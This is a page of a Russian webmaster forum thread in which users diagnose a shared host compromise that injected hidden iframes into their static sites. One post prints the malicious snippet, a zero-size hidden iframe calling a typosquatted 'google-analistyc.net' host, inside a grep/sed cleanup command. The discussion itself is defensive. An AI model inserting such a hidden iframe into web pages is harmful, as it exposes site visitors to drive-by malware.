внимание - взлом хостинга

1 234
Shema
На сайте с 01.12.2005
Offline
176
#21

Zizizi, есть 3 наиболее вероятных варианта:

1) взлом сервера или администраторского аккаунта панели хостера (очень малый % взомов происходит так)

2) взлом вашего пароля на FTP, часто просто троян на вашем компе ворует пароль, сохранённый в FTP-клиенте

3) взлом через уязвимость сайта (например, о такой уязвимости я недавно писал тут)

Определить п.2 или п.3 можно по логам заходов FTP и по логам web-сервера.

Студия Design Coda (http://www.designcoda.ru/). Личные контакты: +7(903)1367564, skype:andrey.oshemkov, telegram:@oshemkov. WMID: 492025973671 (https://passport.webmoney.ru/asp/certview4.asp?wmid=492025973671), делаем и рекламируем сайты, мобильные приложения, ботов для Telegram.
BR
На сайте с 28.06.2008
Offline
75
#22
Zizizi:
антивирь ниче не нашел

- ну а в FTP логах чего? если ничего и в "крепости" своего кода Вы уверены, то можно обратить внимание на настройки безопасности хостера (например отсутствие safe_mode в PHP на shared тарифах или запустить CGI-скрипт и проверить как "далеко" он может пройтись по системе на shared тарифе). Если что-то Вас насторожило и, Вы нашли похожие проблемы у других клиентов живущих на том же сервере, велика вероятность что проблема все же у хостера (хотя очень сомнительно чтобы у такого хостера как ht-systems.ru существовали "детские" проблемы присущие скул хостам).

размещение сайтов (http://www.brim.ru)
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
#23

Я не говорю, что ТС плох, это было к рассказам про "рутовый FTP", и панель управления :)))

При инсталяции сервера обычно даже SSH -root запрещен не то, что бы FTP ... это маразм...

Кто мне там репу портит?

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
[Удален]
#24

кароч нод и дрвеб ниче не нашли, в логах за 7 дней тока мои айпишники

скриптов на моих сайтов не было там одна статика, даже ссай нет

BR
На сайте с 28.06.2008
Offline
75
#25
Zizizi:
в логах за 7 дней тока мои айпишники

- ну и? с Ваших ip-шников правились те файлы где Вы нашли iframe? если да, меняйте FTP-пароль и вспоминайте где Вы могли использовать старый пароль, если нет проблема на стороне хостера

JD
На сайте с 08.12.2008
Offline
471
#26
Brim.ru:
если нет проблема на стороне хостера

Почему Вы делаете такой вывод? Похоже, что Вы не понимаете сам прицпип. Вставка айфрейма (как правило) происходит с другой машины.

Но в данном случае, проблема действительно у ht-systems.

Для удаления вредоносного кода необходимо выполнить:

grep -R google-analistyc.net . | awk '{print $1}' | cut -d ":" -f 1 | xargs -n1 sed -i '' 's|<\!-- ~ --><iframe src=\"http:\/\/google-analistyc.net\/in.cgi?12\" width=\"0\" height=\"0\" style=\"display:none\"><\/iframe><\!-- ~ -->||g'
CL
На сайте с 06.09.2008
Offline
59
CRL
#27
ovm:
Сто раз подымались подобные темы. 99% ищите у себя на компе.

я пользуюсь макос, например, а такая же проблема возникала

icq: 55222222
JD
На сайте с 08.12.2008
Offline
471
#28
CRL:
я пользуюсь макос, например, а такая же проблема возникала

Вы серьезно думаете, что под макось не существует малвари? :)

broken
На сайте с 03.10.2006
Offline
228
#29

вы меня конечно простите великодушно, но у вас с головой в порядке? на первой же странице был дан ответ, что это был взлом хостинга и на 2 странице было сказанно еще раз что взломали хостера. зачем флудить 3 страницы и искать трояна там где его нет? или прочитал первое сообщение ТС и решил ответить не читая топика?

BR
На сайте с 28.06.2008
Offline
75
#30
Jet D.:

Почему Вы делаете такой вывод?
Похоже, что Вы не понимаете сам прицпип.
...
Но в данном случае, проблема действительно у ht-systems.

- я тоже уважаю юмор 😂

1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий